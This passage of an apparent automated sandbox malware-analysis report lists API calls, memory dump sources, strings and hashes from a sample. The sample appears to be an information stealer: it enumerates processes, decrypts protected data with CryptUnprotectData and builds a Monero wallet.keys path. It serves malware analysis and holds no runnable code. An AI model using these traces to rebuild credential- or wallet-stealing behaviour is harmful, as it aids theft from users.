                        • Process32Next.KERNEL32(?,00000128), ref: 009A86F3
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                        • CloseHandle.KERNEL32(?), ref: 009A8761
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        APIs
                        • CryptBinaryToStringA.CRYPT32(00000000,00995184,40000001,00000000,00000000,?,00995184), ref: 009A8EC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00994EEE,00000000,00000000), ref: 00999AEF
                        • LocalAlloc.KERNEL32(00000040,?,?,?,00994EEE,00000000,?), ref: 00999B01
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00994EEE,00000000,00000000), ref: 00999B2A
                        • LocalFree.KERNEL32(?,?,?,?,00994EEE,00000000,?), ref: 00999B3F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID:
                        • API String ID: 4291131564-0
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,009B0E00,00000000,?), ref: 009A79B0
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A79B7
                        • GetLocalTime.KERNEL32(?,?,?,?,?,009B0E00,00000000,?), ref: 009A79C4
                        • wsprintfA.USER32 ref: 009A79F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,015BDAB8,00000000,?,009B0E10,00000000,?,00000000,00000000), ref: 009A7A63
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A7A6A
                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,015BDAB8,00000000,?,009B0E10,00000000,?,00000000,00000000,?), ref: 009A7A7D
                        • wsprintfA.USER32 ref: 009A7AB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID:
                        • API String ID: 3317088062-0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: !;?$;rsy$<}$<}
                        • API String ID: 0-3169814563
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: *Z{$vox$0`
                        • API String ID: 0-691957148
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: E$Xjn{$s*:
                        • API String ID: 0-602696667
                        • Opcode ID: 0e85d8eec08c99623e8f42884ff01adc9a785d552f228b17fd2199cc61f50456
                        • Instruction ID: 487e68d8114b8384ec0ebd3248fcbd8d4ca58617496a0b5cc28f225ae02047bb
                        • Opcode Fuzzy Hash: 0e85d8eec08c99623e8f42884ff01adc9a785d552f228b17fd2199cc61f50456
                        • Instruction Fuzzy Hash: 23B2F5F3A0C2109FE3046E2DEC4567AFBE6EF94720F1A492DEAC4C7744EA3558418796
                        APIs
                        • CoCreateInstance.COMBASE(009AE118,00000000,00000001,009AE108,00000000), ref: 009A3758
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 009A37B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID:
                        • API String ID: 123533781-0
                        • Opcode ID: 7ba39acdad0fa44854f7ebcf60f6519d6c0e127fc8bc4e293812ec518e7922b6
                        • Instruction ID: dddf3bdc723ea99da8eb1effac43c66918823eba2fcfb90cb4e98d12c4acbff5
                        • Opcode Fuzzy Hash: 7ba39acdad0fa44854f7ebcf60f6519d6c0e127fc8bc4e293812ec518e7922b6
                        • Instruction Fuzzy Hash: 2C41E870A40A289FDB24DB58CC95B9BB7B5BB49702F4081D8F609E72D0E7716E85CF90
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00999B84
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00999BA3
                        • LocalFree.KERNEL32(?), ref: 00999BD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: bdb904b1a1f63b60b15c9031f7d0e0f7c97e6a29bbd647a64d5233872b783281
                        • Instruction ID: ddc11364df6f657a1fe45dd180e720dbb5fdfc5ae0febc9ae8ae86dbd1bc5c9b
                        • Opcode Fuzzy Hash: bdb904b1a1f63b60b15c9031f7d0e0f7c97e6a29bbd647a64d5233872b783281
                        • Instruction Fuzzy Hash: F6110CB8A00209DFCB04DF98D995AAEB7B9FF88300F104559ED15A7350E775AE10CF61
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009B15B8,009B0D96), ref: 0099F71E
                        • StrCmpCA.SHLWAPI(?,009B15BC), ref: 0099F76F
                        • StrCmpCA.SHLWAPI(?,009B15C0), ref: 0099F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0099FAB1
                        • FindClose.KERNEL32(000000FF), ref: 0099FAC3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: 07f92438333cf935cdc1c89cb07446efe238d6eb04f9c7de9371248eb7689c75
                        • Instruction ID: c5c8a94f0a9e99ae49bf56da5f102f6821396744954054426e95f25811998b4c
                        • Opcode Fuzzy Hash: 07f92438333cf935cdc1c89cb07446efe238d6eb04f9c7de9371248eb7689c75
                        • Instruction Fuzzy Hash: FE119A3180010D9BDB54FBB4DC65BEE7378AF91310F5046A5A51B57492EF342B4AC7D2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 3U~
                        • API String ID: 0-1632518667
                        • Opcode ID: c34678af00d239050648641aef99c985add44abfdca4e3ab94def4ca806fd493
                        • Instruction ID: 1dc98645d6e39a08567713054f932c5e3e83cc9c5c4b2e57a1d2d078143abeb8
                        • Opcode Fuzzy Hash: c34678af00d239050648641aef99c985add44abfdca4e3ab94def4ca806fd493
                        • Instruction Fuzzy Hash: 7371E3F3E182149BE308AE2CDC5536ABBE5EB58720F1B463DDAC8D3784E9355D044786
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: my^
                        • API String ID: 0-1435853034
                        • Opcode ID: 7d66e08de2d4ff4a6ddef81b5b3582af8b68d61a84da61d74960e7370fdcefa9
                        • Instruction ID: 2da85d945eae11ae5247062e860aaa018a77feda7aed6a763da58e12be4a5552
                        • Opcode Fuzzy Hash: 7d66e08de2d4ff4a6ddef81b5b3582af8b68d61a84da61d74960e7370fdcefa9
                        • Instruction Fuzzy Hash: 847104F3A082109FE3046E29EC8577AB7E9EF94720F1B453DDAC893780E979580586D6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: !!]{
                        • API String ID: 0-3364335677
                        • Opcode ID: 14f8afc0de662d95038410ef6279def8fb76f184806112dba2a3c45ac2b6babd
                        • Instruction ID: 6c18759e9885bd351d29d975c69d324997fc9ae8437a997b49241398cf2e9194
                        • Opcode Fuzzy Hash: 14f8afc0de662d95038410ef6279def8fb76f184806112dba2a3c45ac2b6babd
                        • Instruction Fuzzy Hash: 9E5144F3A186209FD3082E18DC9577AB7E9EFA8720F1B492DEAC597744D6344C018AD6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ow
                        • API String ID: 0-260243922
                        • Opcode ID: 37fea7911a0b02e47110fbec9148d03c333d867b825389042b048e138e01de34
                        • Instruction ID: 027fc8bc2538a82cb583da39cb369a5679523af43c9e9904e6d982b028265552
                        • Opcode Fuzzy Hash: 37fea7911a0b02e47110fbec9148d03c333d867b825389042b048e138e01de34
                        • Instruction Fuzzy Hash: 8C2168F375931D2BE30898B9ECC4727B78ACB44230F298239E751C3BC4ECA9A9044141
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0494e18852fcdfe114d7d022cf847175074c69deb3a2e1d6b6c2c47bdca43c71
                        • Instruction ID: a06ad3caa63b6258db8b942683cedf590f92d753b789768b7e31ebcbd503c647
                        • Opcode Fuzzy Hash: 0494e18852fcdfe114d7d022cf847175074c69deb3a2e1d6b6c2c47bdca43c71
                        • Instruction Fuzzy Hash: 406107F3A181109BE308AA2DDC45B7BBBDADFD4330F1B4A2DF694D7784E93458018696
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4aee4d7dfbddfbfd2bebab65e240bb827e3981b6f3bc7609a09a2a35bcf2907d
                        • Instruction ID: 39ea5589e83272f5da846972d7e849ad9749156c5920fe87b072f62cc8dc608d
                        • Opcode Fuzzy Hash: 4aee4d7dfbddfbfd2bebab65e240bb827e3981b6f3bc7609a09a2a35bcf2907d
                        • Instruction Fuzzy Hash: C15133F3A181004BF30C6A3CED65776B6CADBD4320F2A422DE68587788E87A58054295
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 06c78a14771cca29b1d66eff4df24b5de60c13405fb45118c687200331cc7279
                        • Instruction ID: 269ac346b512b18ea21410c90d2dca803917d7df984dd669e1c4d220e063b5c4
                        • Opcode Fuzzy Hash: 06c78a14771cca29b1d66eff4df24b5de60c13405fb45118c687200331cc7279
                        • Instruction Fuzzy Hash: C741E7B3A085109FE311AE29EC8576BF7D5DF94620F0A853DEAC8D7744FA35980087C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eece32154a7ca660fad4f1e0fe0a68c2dd40a773e81d2dba744f3188386ed470
                        • Instruction ID: 3b56493c4e85146bbc6fdf0334be3ed8d4ca13caf8b11ddc04e34a9c113bafed
                        • Opcode Fuzzy Hash: eece32154a7ca660fad4f1e0fe0a68c2dd40a773e81d2dba744f3188386ed470
